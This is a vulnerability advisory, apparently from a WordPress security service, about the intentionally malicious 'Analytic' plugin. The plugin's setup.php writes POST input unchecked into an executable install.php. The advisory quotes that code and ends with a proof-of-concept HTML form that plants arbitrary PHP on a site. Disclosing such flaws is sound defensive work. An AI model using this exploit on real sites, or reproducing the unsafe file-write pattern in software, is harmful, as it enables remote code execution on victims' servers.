Back in October we discussed our spotting a probe for usage of a group of intentionally malicious plugins that someone had created several years ago and then in February and March we spotted a couple more plugins that looks to be from the set of plugins being targeted. We recently ran across requests for yet another plugin that looks to be part of that set, Analytic, which like the others contains a remote code execution (RCE) vulnerability.

When a request is sent to the file /setup.php the contents of the POST input “install” is placed in the file /install.php:

2
3
4
5
6
7
8
9
10

session_start();
$installit = $_POST['install'];
$fp = fopen($_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/analytic/install.php', 'w');
$installit = str_replace('\\', '', $installit);
$installit = htmlentities($installit);
fwrite($fp, html_entity_decode($installit));
fclose($fp);
echo $installit;
unlink($_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/analytic/default.html');

Due to its .php extension that will allow PHP code placed in the file to be executed when it is requested.

As with other plugins where we see exploitation attempts we are adding this vulnerability to the free data that comes with our service’s companion plugin, so you can check if you are using any of this set of plugins by simply installing that plugin (as well as checking for other plugins that have been targeted by hackers).

Proof of Concept

The following proof of concept will place the specified PHP code in to the file install.php in the directory /wp-content/plugins/analytic/.

Make sure to replace “[path to WordPress]” with the location of WordPress and “[PHP code]” with the PHP code you want in the uploaded file.

<html>
<body>
<form action="http://[path to WordPress]/wp-content/plugins/analytic/setup.php" method="POST">
<input type="hidden" name="install" value="[PHP code]" />
<input type="submit" value="Submit" />
</form>
</body>
</html>